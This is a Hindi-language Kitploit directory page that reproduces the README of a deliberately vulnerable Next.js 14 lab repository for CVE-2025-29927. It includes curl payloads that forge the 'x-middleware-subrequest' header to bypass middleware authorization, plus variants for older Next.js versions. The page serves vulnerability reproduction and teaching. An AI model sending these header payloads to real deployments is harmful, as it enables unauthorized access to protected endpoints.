Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — उपयोग न करें। असुरक्षित | Kitploit
उपकरण/GitHubGitHub/adjscent/vulnerable-nextjs-14-cve-2025-29927
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubadjscent/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

उपयोग न करें। असुरक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-29927 प्राधिकरण बाईपास पुनरुत्पादन

यह रिपॉजिटरी next पैकेज में CVE-2025-29927 भेद्यता का पुनरुत्पादन है।

कैसे पुनरुत्पादित करें

  1. नीचे दिए गए चरणों का पालन करके Next.js एप्लिकेशन को क्लोन और चलाएं।
  2. प्राधिकरण द्वारा /api/hello एंडपॉइंट तक पहुंच अस्वीकार करने का परीक्षण करें।
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. जब टोकन प्रदान किया जाता है तो प्राधिकरण काम करता है इसका परीक्षण करें।
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. अब इसे विशेष x-middleware-subrequest हेडर में middleware को 5 बार नेस्ट करके भी बाईपास किया जा सकता है:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

पुराने Next.js संस्करणों के लिए CVE-2025-29927 का शोषण

Next.js 12 और 13 संस्करणों में मिडलवेयर फ़ाइल (_middleware.js) के लिए एक अलग नामकरण परंपरा थी, जिसे Next.js 14 में बदलकर middleware.js कर दिया गया। इस भेद्यता का पुराने संस्करणों में _middleware.js फ़ाइल का उपयोग करके शोषण किया जा सकता है।

उदाहरण के लिए, निम्नलिखित पेलोड लागू होंगे, यह Next.js संस्करण और आपकी रूटिंग कन्वेंशन पर निर्भर करता है:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (Next.js संस्करण 12.2 के लिए जहां middleware.js फ़ाइल ऐप की रूट में है, pages निर्देशिका के अंदर नहीं।)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (Next.js संस्करण 11 से 12.2 तक के लिए।)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

आरंभ करना

सबसे पहले, डेवलपमेंट सर्वर चलाएं:

npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

परिणाम देखने के लिए अपने ब्राउज़र में http://localhost:3000 खोलें।

आप app/page.js को संशोधित करके पेज को संपादित करना शुरू कर सकते हैं। फ़ाइल संपादित करने पर पेज स्वचालित रूप से अपडेट होता है।

यह प्रोजेक्ट Vercel के लिए एक नया फ़ॉन्ट परिवार Geist को स्वचालित रूप से अनुकूलित और लोड करने के लिए next/font का उपयोग करता है।

और जानें

Next.js के बारे में अधिक जानने के लिए, निम्नलिखित संसाधनों पर एक नज़र डालें:

  • Next.js दस्तावेज़ीकरण - Next.js सुविधाओं और API के बारे में जानें।
  • Next.js सीखें - एक इंटरैक्टिव Next.js ट्यूटोरियल।

आप Next.js GitHub रिपॉजिटरी देख सकते हैं - आपकी प्रतिक्रिया और योगदान का स्वागत है!

Vercel पर डिप्लॉय करें

अपने Next.js ऐप को डिप्लॉय करने का सबसे आसान तरीका Next.js के निर्माताओं के Vercel प्लेटफ़ॉर्म का उपयोग करना है।

अधिक जानकारी के लिए हमारा Next.js डिप्लॉयमेंट दस्तावेज़ीकरण देखें।

टूल डाउनलोड करें